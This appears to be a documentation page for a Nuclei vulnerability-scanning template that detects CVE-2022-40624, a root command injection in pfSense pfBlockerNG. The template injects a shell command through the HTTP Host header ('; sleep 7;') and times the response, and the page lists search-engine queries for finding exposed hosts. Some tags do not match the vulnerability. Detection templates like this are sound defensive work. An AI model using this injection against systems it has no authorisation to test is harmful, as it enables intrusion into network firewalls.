Skip to content
Nuclei Templates

pfSense pfBlockerNG - OS Command Injection

ID: CVE-2022-40624

Severity: critical

Author: ritikchaddha

Tags: cve,cve2024,pfsense,pfblockerng,rce,sqli,netgate

Description

Section titled “Description”

pfSense pfBlockerNG through 2.1.4_27 allows remote attackers to execute arbitrary OS commands as root via the HTTP Host header.

YAML Source

Section titled “YAML Source”
id: CVE-2022-40624


info:
  name: pfSense pfBlockerNG - OS Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    pfSense pfBlockerNG through 2.1.4_27 allows remote attackers to execute arbitrary OS commands as root via the HTTP Host header.
  impact: |
    Allows remote attackers to execute arbitrary code on the affected system
  remediation: |
    Update to the latest version of pfSense pfBlockerNG to mitigate CVE-2022-40624
  reference:
    - https://github.com/dhammon/pfBlockerNg-CVE-2022-40624
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40624
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-40624
    cwe-id: CWE-78
    epss-score: 0.00608
    epss-percentile: 0.78334
    cpe: cpe:2.3:a:pfsense:pfblockerng:*:*:*:*:*:*:*:*
  metadata:
    vendor: pfsense
    product: pfblockerng
    shodan-query: "pfBlockerNG"
    fofa-query: "pfBlockerNG"
  tags: cve,cve2024,pfsense,pfblockerng,rce,sqli,netgate


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /pfblockerng/www/index.php HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "GIF")'
          - 'contains(content_type, "image/gif")'
        condition: and
        internal: true


  - raw:
      - |+
        @timeout: 20s
        GET /pfblockerng/www/index.php HTTP/1.1
        Host: {{Hostname}}' *; sleep 7; '


    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - duration>=7
# digest: 490a0046304402205abcfb2ce0db703ae59fff7b6d8e28e64fbf0a325d14c06471c42331e8a558f102203ef162a43c6a735364e9293afe0d1a0da8312c7801f4e2a6af782dee7162a256:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-40624.yaml"

View on Github